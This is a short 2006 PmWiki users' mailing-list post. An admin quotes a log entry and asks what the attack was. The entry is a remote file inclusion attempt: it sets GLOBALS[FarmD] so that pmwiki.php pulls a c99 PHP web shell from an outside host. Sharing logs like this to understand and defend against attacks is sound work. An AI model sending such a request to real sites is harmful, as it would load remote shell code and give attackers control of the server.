[pmwiki-users] CSS style attack on PmWiki?
Robin Sheat
robin at kallisti.net.nz
Wed Feb 1 15:08:05 CST 2006
I just saw this in my logs:
198.87.3.70 - - [02/Feb/2006:09:26:49 +1300]
"GET /PmWiki/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.world-garments.com/q/c99shell.txt?
HTTP/1.1" 302 152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sq-AL;
rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
Someone with a bit more PHP knowledge might know what they were trying to
do. It didn't work on my site, anyway, due to the URL rewriting I do
breaking things for them.
--
Robin <robin at kallisti.net.nz> JabberID: <eythian at jabber.kallisti.net.nz>
Hostes alienigeni me abduxerunt. Qui annus est?
PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8 7175 14D3 6485 A99C EB6D
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : /pipermail/pmwiki-users/attachments/20060202/fe2f52c0/attachment.bin
More information about the pmwiki-users
mailing list